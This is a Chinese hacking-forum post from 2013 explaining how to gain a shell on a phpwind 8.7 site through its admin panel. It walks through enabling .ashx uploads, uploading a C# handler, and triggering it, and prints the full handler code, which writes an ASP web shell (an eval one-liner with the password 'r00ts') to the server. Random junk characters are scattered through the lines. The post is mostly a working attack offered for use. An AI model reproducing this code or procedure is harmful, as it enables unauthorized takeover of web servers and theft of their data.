找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2096|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
" V( b, O0 T, U ) F  h) K  U+ N; \  B: W$ b
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx, Z! h# g+ Y% K; [6 G, o
2 s* h+ I% X* ~( _* y0 e3 r$ S1 ]6 C$ w
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整( `# h0 X5 r3 r. \! M" \1 _
; p" M  S7 D* f3 G% K8 P! b
然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx- E# f& y' z1 ]( C  R

4 {  S( R1 k7 {打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
6 Y" b5 D" @' |( C& a5 t7 |: H' p
" [# a; r# k7 a. \# j6 ^下面是代码:
- v. w% t: F- `1 i' k ( Q- d) J0 i  n
<%@ WebHandler Language="C#"Class="Handler" %>3 L  a1 W8 i; N" Y
using System;
5 o0 x' {+ ~$ d( }/ r9 Lusing System.Web;
4 \/ S% _3 f7 }8 Z1 x4 tusing System.IO;
% ?; O1 f" Q: upublic class Handler : IHttpHandler {) U5 c" x/ w" r# T  p
public void ProcessRequest (HttpContext context) {( ^9 R8 _. k) |( \; A0 r
context.Response.ContentType = "text/plain";1 E- z2 A: a- E
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
( s' i; q1 a! }, _6 v* |- X5 Xfile1.Write("<%eval request(\"r00ts\")%>");
+ v0 @$ B5 l% }8 L6 \7 ?/ ]file1.Flush();
- m$ W4 K) D+ \  \; `3 }7 ~+ bfile1.Close();3 A7 c& H  G. g$ x
}; c% q- e# s, G9 u( T
public bool IsReusable {
/ Z1 w( l6 V0 k! k7 U( vget {
4 q+ N+ J: p: Yreturn false;
, E" @1 ?# f7 @& \5 f}
! H4 X. c+ m# j. }}2 r7 w/ i$ Z+ r* B  h
}  t! V6 l( L+ P
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表